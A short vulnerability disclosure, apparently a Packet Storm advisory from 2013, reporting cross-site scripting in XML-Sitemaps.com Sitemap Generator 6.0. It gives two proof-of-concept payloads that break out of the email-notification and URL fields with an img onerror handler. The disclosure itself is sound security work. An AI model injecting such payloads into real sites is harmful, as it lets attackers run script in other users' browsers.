XML-Sitemaps.com Sitemap Generator 6.0 Cross Site Scripting

2013-07-02T00:00:00
ID PACKETSTORM:122253
Type packetstorm
Reporter Christy Philip Mathew
Modified 2013-07-02T00:00:00

Description

                                        
                                            `# XML-Sitemaps.com Sitemap Generator  
# Date: 2nd July 2013  
# Author: Christy Philip Mathew (www.offcon.org)  
# Vendor or Software Link: http://www.xml-sitemaps.com/generator-demo/  
# Version : 6.0  
  
*XSS Vulnerability *  
  
(a) Configuration > Miscellaneous Settings > Send email notifications:  
  
Update the email to a@a.com"><img src=x onerror=prompt(0);>  
  
(b) Update the URL input box with  
  
http://site.com"><img src=x onerror=prompt(/XSS/);>  
  
Screenshot Attached  
  
  
All the Best  
  
*Christy Philip Mathew*  
Information Security Researcher  
Twitter: @christypriory  
`